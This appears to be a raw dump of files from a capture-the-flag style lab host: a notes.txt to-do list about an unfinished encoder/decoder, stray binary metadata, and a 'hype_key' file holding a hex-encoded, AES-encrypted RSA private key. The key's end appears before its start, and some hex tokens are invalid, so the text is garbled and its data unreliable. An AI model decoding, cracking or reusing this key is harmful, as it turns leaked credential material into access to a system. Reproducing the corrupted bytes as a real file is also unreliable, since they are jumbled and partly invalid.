39 57 70 36 79 38 58 58 38 2b 46 34 30 72 78 6c 35 0d 0a 58 71 68 44 55 42 68 79 6b 31 43 33 59 50 4f 6f9 44 75 50 4f 6e 4d 58 61 49 70 65 31 64 67 62 30 4e 64 44 31 4d 39 5a 51 53 4e 55 4c 77 31 44 48 43 47 50 50 34 4a 53 53 78 58 37 42 57 64 44 4b 0d 0a 61 41 6e 57 4a 76 46 67 6c 41 34 6f 46 42 42 56 41 38 75 41 50 4d 66 56 32 58 46 51 6e 6a 77 55 54 35 62 50 4c 43 36 35 74 46 73 74 6f 52 74 54 5a 31 75 53 72 75 61 69 32 37 6b 78 54 6e 4c 51 0d 0a 2b 77 51 38 37 6c 4d 61 64 64 73 31 47 51 4e 65 47 73 4b 53 66 38 52 2f 72 73 52 4b 65 65 4b 63 69 6c 44 65 50 43 6a 65 61 4c 71 74 71 78 6e 68 4e 6f 46 74 67 30 4d 78 74 36 72 32 67 62 31 45 0d 0a 41 6c 6f 51 36 6a 67 35 54 62 6a 35 4a 37 71 75 59 58 5a 50 79 6c 42 6c 6a 4e 70 39 47 56 70 69 6e 50 63 33 4b 70 48 74 74 76 67 62 70 74 66 69 57 45 45 73 5a 59 6e 35 79 5a 50 68 55 72 39 51 0d 0a 72 30 38 70 6b 4f 78 41 72 58 45 32 64 6a 37 65 58 2b 62 71 36 35 36 33 35 4f 4a 36 54 71 48 62 41 6c 54 51 31 52 73 39 50 75 6c 72 53 37 4b 34 53 4c 58 37 6e 59 38 39 2f 52 5a 35 6f 53 51 65 0d 0a 32 56 57 52 79 54 5a 31 46 66 6e 67 4a 53 73 76 39 2b 4d 66 76 7a 33 34 31 6gc 62 7a 4f 49 57 6d 6b 37 57 66 45 63 57 63 48 63 31 36 6e 39 56 30 49 62 53 4e 41 4c 6e 6a 54 68 76 45 63 50 6b 79 0d 0a 65 31 42 73 66 53 62 73 66 39 46 67 75 55 5a 6b 67 48 41 6e 6e 66 52 4b 6b 47 56 47 31 4f 56 79 75 77 63 2f 4c 56 6a 6d 62 68 5a 7a 4b 77 4c 68 61 5a 52 4e 64 38 48 45 4d 38 36 66 4e 6f 6a 50 0d 0a 30 39 6e 56 6a 54 61 59 74 57 55 58 6b 30 53 69 31 57 30 32 77 62 75 31 4e 7a 4c 2b 31 54 67 39 49 70 4e 79 49 53 46 43 46 59 6a 53 71 69 79 47 2b 57 55 37 49 77 4b 33 59 55 35 6b 70 33 43 43 0d 0a 64 59 53 63 7a 36 33 51 32 70 51 61 66 78 66 53 62 75 76 34 43 4d 6e 4e 70 64 69 72 56 4b 45 6f 35 6e 52 52 66 4b 2f 69 61 4c 33 58 31 52 33 44 78 56 38 65 53 59 46 4b 46 4c 36 70 71 70 75 58 0d 0a 63 59 35 59 5a 4a 47 41 70 2b 4a 78 73 6e 49 51 39 43 46 79 78 49 74 39 32 66 72 58 7a 6e 73 6a 68 6c 59 61 38 73 76 62 56 4e 4e 66 6b 2f 39 66 79 58 36 6f 70 32 34 72 4c 32 44 79 45 53 70 59 0d 0a 70 6e 73 75 6b 42 43 46 42 6b 5a 48 57 4e 4e 79 65 4e 37 62 35 47 68 54 56 43 6f 64 48 68 7a 48 56 46 65 68 54 75 42 72 70 2b 56 75 50 71 61 71 44 76 4d 43 56 65 31 44 5a 43 62 34 4d 6a 41 6a 0d 0a 4d 73 6c 66 2b 39 78 4b 2b 54 58 45 4c 33 69 63 6d 49 4f 42 52 64 50 79 77 36 65 2f 4a 6c 51 6c 56 52 6c 6d 53 68 46 70 49 38 65 62 2f 38 56 73 54 79 4a 53 65 2b 62 38 35 33 7a 75 56 32 71 4c 0d 0a 73 75 4c 61 42 4d 78 59 4b 6d 33 2b 7a 45 44 49 44 76 65 4b 50 4e 61 61 57 5a 67 45 63 71 78 79 6c 43 43 2f 77 55 79 55 58 6c 4d 4a 35 30 4e 77 36 4a 4e 56 4d 4d 38 4c 65 43 69 69 33 4f 45 57 0d 0a 6c 30 6c 6e 39 4c 31 62 2f 4e 58 70 48 6a 47 61 38 57 48 48 54 6a 6f 49 69 6c 42 35 71 4e 55 79 79 77 53 65 54 42 46 32 61 77 52 6c 58 48 39 42 72 6b 5a 47 34 46 63 34 67 64 6d 57 2f 49 7a 54 0d 0a 52 55 67 5a 6b 62 4d 51 5a 4e 49 49 66 7a 6a 31 51 75 69 6c 52 56 42 6d 2f 46 37 36 59 2f 59 4d 72 6d 6e 4d 39 6b 2f 31 78 53 47 49 73 6b 77 43 55 51 2b 39 35 43 47 48 4a 45 38 4d 6b 68 44 33 0d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d custom-colorsA !A Ey% oS$G'  notes.txtTo do: 1) Coffee. 2) Research. 3) Fix decoder/encoder before going live. 4) Make sure encoding/decoding is only done client-side. 5) Don't use the decoder/encoder until any of this is done. 6) Find a better way to take notes. custom-colorsA hA v#'  hype_key2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0d 0a 50 72 6f 63 2d 54 79 70 65 3a 20 34 2c 45 4e 43 52 59 50 54 45 44 0d 0a 44 45 4b 2d 49 6e 66 6f 3a 20 41 45 53 2d 31 32 38 2d 43 42 43 2c 41 45 42 38 38 43 31 34 30 46 36 39 42 46 32 30 37 34 37 38 38 44 45 32 34 41 45 34 38 44 34 3c